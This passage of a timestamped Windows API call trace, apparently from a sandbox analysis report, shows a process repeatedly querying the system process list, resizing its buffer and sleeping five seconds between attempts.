BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.110] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.110] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.114] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.114] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.116] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.116] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.117] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.117] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.117] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.121] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.122] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.133] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.134] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.134] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.135] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.138] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.139] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.143] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.144] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.144] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.144] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.148] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.149] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.150] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.151] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.151] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.156] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.157] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.159] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.159] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.160] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.160] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.160] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.164] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.165] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.166] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.167] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.167] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.167] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.168] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.171] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.172] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.173] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.173] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.174] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.174] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.174] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.178] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.179] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.180] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.181] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.181] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.181] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.182] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.185] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.186] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.187] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.187] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.188] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.188] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.188] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.192] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.193] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.194] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.195] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.195] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.195] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.196] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.199] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.200] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.201] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.201] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.201] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.202] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.202] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.206] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.206] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.208] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.208] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.208] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.209] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.209] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.212] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.213] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.214] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.215] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.215] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.215] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.215] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.219] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.220] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.221] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.222] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.222] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.222] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.222] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.226] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.226] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.228] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.228] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.229] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.229] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.229] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.233] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.234] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.235] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.236] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.236] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.236] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.236] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.240] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.241] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.242] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.243] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.243] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.243] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.244] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.247] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.248] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.249] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.249] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.250] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.250] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.251] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.254] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.255] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.257] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.257] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.258] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.258] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.258] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.262] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.263] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.264] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.265] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.265] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.269] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.269] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.271] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, 